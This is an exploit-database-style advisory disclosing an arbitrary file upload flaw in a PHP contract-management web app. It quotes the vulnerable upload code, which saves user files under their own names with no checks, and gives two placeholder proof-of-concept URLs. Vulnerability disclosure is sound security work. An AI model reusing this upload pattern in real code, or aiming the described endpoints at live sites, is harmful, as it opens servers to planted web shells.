47 lines
No EOL
1.5 KiB
Text
47 lines
No EOL
1.5 KiB
Text
# # # # #
|
|
# Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload
|
|
# Dork: N/A
|
|
# Date: 26.09.2017
|
|
# Vendor Homepage: http://mojoomla.com/
|
|
# Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703
|
|
# Demo: http://dasinfomedia.com.au/php/amc/
|
|
# Version: N/A
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Social: @ihsansencan
|
|
# # # # #
|
|
# Description:
|
|
#
|
|
# The vulnerability allows an users upload arbitrary file....
|
|
#
|
|
# Vulnerable Source:
|
|
#
|
|
# if(isset($id)){
|
|
# $user_d=$this->request->data;
|
|
# $this->row_update=$this->table_user->get($id);
|
|
# $this->set('emp_update_row',$this->row_update);
|
|
#
|
|
# if($this->request->is(['post','put'])){
|
|
#
|
|
# $get_output=$this->check_update_email($this->row_update,$this->request->data('email'));
|
|
#
|
|
# if($get_output == true){
|
|
#
|
|
# if(isset($_FILES['image']['name']) && !empty($_FILES['image']['name'])){
|
|
# move_uploaded_file($_FILES['image']['tmp_name'],$this->user_image.$_FILES['image']['name']);
|
|
# $this->store_image=$_FILES['image']['name'];
|
|
# }else{
|
|
# $this->store_image=$this->request->data('old_image');
|
|
# }
|
|
#
|
|
# Proof of Concept:
|
|
#
|
|
# http://localhost/[PATH]/account/profilesetting/[ID]
|
|
# http://localhost/[PATH]/img/user/[FILE]
|
|
#
|
|
# Etc..
|
|
# # # # # |